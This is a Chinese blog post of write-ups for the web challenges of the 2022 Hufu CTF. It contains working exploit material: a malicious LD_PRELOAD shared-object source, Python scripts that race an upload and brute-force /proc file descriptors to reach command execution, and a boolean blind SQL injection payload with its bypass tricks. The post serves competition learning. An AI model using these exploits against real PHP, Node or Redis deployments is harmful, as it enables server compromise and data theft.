2022虎符线上团队赛 有关web的部分题解(持续更新)

最新推荐文章于 2022-03-30 08:00:00 发布
最新推荐文章于 2022-03-30 08:00:00 发布
阅读量4.1k 收藏 1
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51458899/article/details/123679594
版权

ezphp

可以参考jacko大神的虎符CTF (wolai.com)

题目是与p神之前的博客相似:

我是如何利用环境变量注入执行任意命令 | 离别歌 (leavesongs.com)

可惜题目相同环境不同,刚好此题是上面博客未解答的部分

最终通过查阅资料发现:

hxp CTF 2021 - A New Novel LFI - 跳跳糖 (tttang.com)

简单而言就是 fastcgi在处理过大的临时文件时,删除文件没有关闭句柄导致/proc/PID/fd/泄露,于是制造了文件上传的点

关于动态链接库的制作(恶意exp.so):

通过LD_PRELOAD绕过disable_functions - 知乎 (zhihu.com)

exp.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

__attribute__ ((__constructor__)) void preload (void){
  unsetenv("LD_PRELOAD");
  system("id");
  system("cat /flag > /var/www/html/flag");
}

image-20220323094818987

gcc -shared -fPIC hook_exp.c -o hook_exp.so

以前以为gcc有问题也没事(之前编译别的成功过),像下图这样就是错的

image-20220322223807319

当直接回车的时候没用任何报错就可以,这时候产生了恶意exp.so ,作为动态链接库,他会被优先执行

然后这有两个脚本,一个是jacko师傅写的,不过我这里由于本地环境存在问题没有跑通(别人可以)

import requests
import _thread

f=open("exp.so",'rb')
data=f.read()
url="http://127.0.0.1:5141/"


def upload():
    print("start upload")
    while True:
        requests.get(url+"index.php",data=data)

def preload(fd):
    while True:
        print("start ld_preload")
        for pid in range(10,20):
            file = f'/proc/{pid}/fd/{fd}'
            # print(url+f"index.php?env=LD_PRELOAD={file}")
            resp = requests.get(url+f"index.php?env=LD_PRELOAD={file}")
            # print(resp.text)
            if 'uid' in resp.text:
                print("finished")
                exit()

try:
    _thread.start_new_thread(upload, ())
    for fd in range(1, 20):
        _thread.start_new_thread(preload,(fd,))
except:
    print("error")

while True:
    pass

也可以考虑r3师傅写的(这里复现成功)

import  threading, requests
URL2 = f'http://127.0.0.1:5141/index.php'
nginx_workers = [12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]
done = False


def uploader():
    print('[+] starting uploader')
    with open("exp.so","rb") as f:
        data = f.read()
    while not done:
        requests.get(URL2, data=data)
for _ in range(16):
    t = threading.Thread(target=uploader)
    t.start()
def bruter(pid):
    global done
    while not done:
        print(f'[+] brute loop restarted: {pid}')
        for fd in range(4, 32):
            try:
                requests.get(URL2, params={
                    'env': f"LD_PRELOAD=/proc/{pid}/fd/{fd}"
                })
            except:
                pass


for pid in nginx_workers:
    a = threading.Thread(target=bruter, args=(pid, ))
    a.start()

成功以后,访问flag可以下载到flag

image-20220323094058566

ezsql

```sql
CREATE TABLE `auth` (
  `id` int NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `auth_username_uindex` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
```

```js
import { Injectable } from '@nestjs/common';
import { ConnectionProvider } from '../database/connection.provider';

export class User {
  id: number;
  username: string;
}

function safe(str: string): string {
  const r = str
    .replace(/[\s,()#;*\-]/g, '')
    .replace(/^.*(?=union|binary).*$/gi, '')
    .toString();
  return r;
}

@Injectable()
export class AuthService {
  constructor(private connectionProvider: ConnectionProvider) {}

  async validateUser(username: string, password: string): Promise<User> | null {
    const sql = `SELECT * FROM auth WHERE username='${safe(username)}' LIMIT 1`;
    const [rows] = await this.connectionProvider.use((c) => c.query(sql));
    const user = rows[0];
    if (user && user.password === password) {
      // eslint-disable-next-line @typescript-eslint/no-unused-vars
      const { password, ...result } = user;
      return result;
    }
    return null;
  }
}
```

详见jacko大神的虎符CTF (wolai.com)

jacko大神分析的很好,我简单总结一下

看到这道题的waf无法双写绕过union之后,考虑到可能最终无法直接使用sql特性登录

这时候通过观察状态码,发现报错和执行布尔值为1的语句状态码不同,利用这个地方盲注

SELSELECT * FROM auth WHERE username=''||case`username`regexp'^a'when'1'then~0+1+''else'0'end||'' LIMIT 1;

case when then 是一种与if起到相同功能的写法

反引号可以包裹字段

整形溢出:~0+1这样就是整形溢出,先对0取反(变成1111…),加一的话要进位,就溢出了

编写脚本可以成功(其中密码为24位,账号为16位,可以先确定长度再注)

至于有人看jacko的脚本为什么有那么多个反斜杠,这是因为:

两个反斜杠代表一个实际的反斜杠,这里一种编程语言要一个反斜杠,那么这里是python+node+mysql8一共3个反斜杠

合情推理如果你用burp就只需要2个(node+mysql8)

报错再盲注,看返回4xx还是5xx
password=aaaaaa&username=’%7C%7Ccase%60password%60regexp’…‘when’1’then~0%2B1%2B’‘else’0’end%7C%7C’
用户名长度16位、密码长度24位

image-20220320133637115

redis crash

草了,傻逼题,直接溢出得了

不过考虑到是怎么搭的会比较有意思

redis rce

草了,给出题人搞了,原来可以\r\n绕过白名单,估计又是正则没写好,下次一定先绕一绕白名单再说

CVE-2022-0543 (问题是为啥人家搜的到)

参考

https://www.adminxe.com/3620.html

记住要双引号转义

image-20220320162740854

ththaiai
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
虎符创新大web部分
weixin_43610673的博客
04-23 613
easy_login 题目说明: 最近正在开始学习nodejs开发,不如先写个登陆界面练练手。什么,大佬说我的程序有bug?我写的代码逻辑完美顺利运行怎么可能出错?!错的一定是我的依赖库!! 提示说题目依赖库存在问题。 打开是个登录框 尝试注册admin用户,按提示来看应该已经有admin用户了,需要登录admin账号获取flag 查看源码 是登录注册等功能的一些函数,顶部有提示(比的时...
2021虎符web部分
羽的博客
04-04 2270
签到 根据提示直接在网上搜新闻。 这个后门代码很简单,它被加到zlib扩展里,当发现请求User-Agentt中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。黑客大概是希望传入并执行zerodiumphpinfo();这样的内容。 也就是说zerodiumsystem将会有system函数的功能。 payload: unsetme 在网站上下载下来源码,修改index.php后本地搭建。 开启报错后爆出关键内容 找到代码位置 其中$key为我们传入的a的内容
2022虎符网络安全CTF部分wp(2)
没事我溜达
03-22 2371
Web | babysql 进入靶场查看限制,发现账号不过滤单引号,然后开始对密码进行尝试。 后面使用like函数,用like函数爆出两位特殊字符后,就开始爆剩下的字符了。 通过盲注,来不断猜测字符。最后得出密码为:m52fpldxyylb^eizar!8gxh$ payload:username=a%27||`password`like%27m52§6§%25%27%26%26`id`=%271%27||`password`regexp'[&password=1 like不
2022 虎符 pwn hfdev(三)
yongbaoii的博客
03-30 783
终于说到了解题
虎符科技网络安全通信服务三种解决方案推选PPT文档.ppt
10-27
同时,兼容普通电话,即使在没有定制硬件的情况下,也能确保部分线路的安全性。 综上所述,虎符科技的网络安全通信服务解决方案是针对现有网络安全挑战的一次创新尝试,旨在通过先进的标识认证技术和安全通信服务...
2022数字中国创新大虎符网络安全道 初4道题 vdq-mva-fpbe-static.zip
最新发布
04-22
2022数字中国创新大虎符网络安全道 初4道题 vdq-mva-fpbe-static
新锐 _ 虎符网络王伟alert7:人总是要挑战下自己的.pdf
09-18
新锐 _ 虎符网络王伟alert7:人总是要挑战下自己的 安全管理 安全意识教育 端点安全 数据分析 云安全
高中历史之图说历史秦杜虎符:中华现存最早调兵凭证素材
09-09
高中历史之图说历史秦杜虎符:中华现存最早调兵凭证素材
虎符ctf wp
haiyang19的博客
03-25 1390
虎符ctf wp by BOI战队 WEB ezsql 绕过空格和函数利用状态码进行布尔盲注 利用mysql8特性collate关键字区分大小写 import requests url = "http://47.107.231.226:31042/login" proxy = {"http": "http://127.0.0.1:8080"} string = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890^!$" #s
虎符2022_babygame
zyxx_wjc的博客
03-22 5680
菜鸡上去打了一下,果然爆零一轮游了。 学到了不少东西,比如这个babygame(也就这题我能做了)。 checksec一下发现防护全开,Canary,PIE都开了。扔进ida里,发现程序的流程还是很好分析的:先输入名字,然后猜拳,猜拳连胜100轮后就能跑到一个函数中(显然是要覆盖随机数种子),这个函数里有一个格式化字符串漏洞,可供利用。总的来说,它像一个缝合怪...... 容易看到输入名字时有一个栈溢出漏洞,但是因为这题开了canary,所以需要通过溢出漏洞泄露canary以及下面连带的las
2022 虎符 babygame
sky123博客
03-22 754
分析主程序: 首先执行 game 函数,返回结果大于 0 则执行 vul 函数。 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char buf[256]; // [rsp+0h] [rbp-120h] BYREF unsigned int v5; // [rsp+100h] [rbp-20h] int suc; // [rsp+104h] [rbp-1Ch] unsigned __int64 v7; // [rsp+
2022 虎符 pwn babygame
yongbaoii的博客
03-21 617
这次最简单的题目题目也是被打烂了
2021虎符CTF逆向wp
FIshy000的博客
04-10 577
红明谷-g0 看名字就是go语言题目,用IDA-golang-helper还原符号表之后,看到只有几个函数,其中main_Encode就是加密函数 函数逻辑比较简单,输入长度等于20,打乱位置,进入main_Encode加密,最后进入main_fun1进行比较,直接看main_Encode中的加密算法 动态调试后发现一张表,表的长度为58位,判断为换表base58加密 进入main_fun1函数中找到加密后的字符串,注意 runtime_memequal这个比较的函数需要在汇编中寻找比较的字符串首地址
2021虎符CTF逆向WP
Whitebird的博客
04-06 1045
周六打了2021虎符的比,由于刚入门逆向,也就写出来了一题,后复现了一波,可能会有写错的地方,欢迎大佬指出。 一、redemption_code二、CrackMe三、GoEncrypt 一、redemption_code 首先,拿到这道题,我们查一下壳,并没有加壳。然后拉入ida32查看一下 看了下大概的流程,写了点注释,接下来我们的重点就是pre(v11);和server_check_redemption_code 两个函数 对pre函数写了点注释,我们看到pre的函数和main函数都有ser
虎符CTF2022 handle - MISC
weixin_45760568的博客
03-23 4368
虎符CTF2022 | MISC | handle (2022数字中国创新大虎符网络安全道) Part of 【COMPASS CTF】 WriteUp by Frankss@COMPASS handle (二血 909pt) 思路 (隔壁某show平台上周刚做过某套神类似的题,于是很快就把字典搞出来了,但是交互写了很久丢掉了一血) 思路就是找一个有优势的固定词开头,然后根据返回结果分枝(枝),根据不同枝选择不同的尝试(剪枝),这样接下来要处理的重复量就少很多,重复这个过程两次,几乎每一个可能的词都
有关一级域名二级域名三级域名
shuiyuehaha的专栏
11-20 10万+
一级域名:http://www.wellaiai.com/(前面是www的通用网址) 二级域名:http://vip.wellaiai.com/(www替换成了别的) 二级目录:http://www.wellaiai.com/xiemanhua/ 三级域名: http://bbs.at.abc.com, 当然也可以建立四级域名:http://bbs.at.go.abc.co
2013返利网评测报告 -来自爱爱网
热门推荐
ht19910818的专栏
10-04 34万+
www.aiai178.com | 爱爱网  背景  返利事业蒸蒸日上,国内出现很多返利网站。那家返利最多,返利最快成为返利用户最关心的事情。有必要对返利网站进行整理,为用户提供真实的返利评测报告。  样本  评测选取样本为国内15家比较出名的返利网站,他们分别是:返还网,51返利网,爱爱网,51比购网,易购返利,QQ返利,网易返现,给惠网,懒人返利网,米折网,木凡返利,秀当网,特米返还,
[每日一题][HXBCTF 2021]easywill
Sapphire037的博客
11-17 672
笔记 打开页面得到 <?php namespace home\controller; class IndexController{ public function index(){ highlight_file(__FILE__); assign($_GET['name'],$_GET['value']); return view(); } } 然后显示的是一个WillPHP,还以为是恶搞(我没文化),一查真有这东西,页面给了个函数as
2021CTF工业信息安全技能大-PLC故障分析
qq_43264813的博客
07-02 3984
2021CTF工业信息安全技能大-PLC故障分析 某天工业现场生产线设备出现故障报警,请通过事发时的数据包分析报警原因,找到flag。flag格式为:flag{}。 解题步骤 1.根据题目名称过滤moubus协议获取到四个base64编码字符串拼接: MHg3ZjB4MzUweDNmMHg0YTB4NzQweDczMHg2NjB4N2QweDY5MHg2MzB4NmUweDY43 modbus && modbus.func_code == 2.将base64解码后得到16进制字符串,转换

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值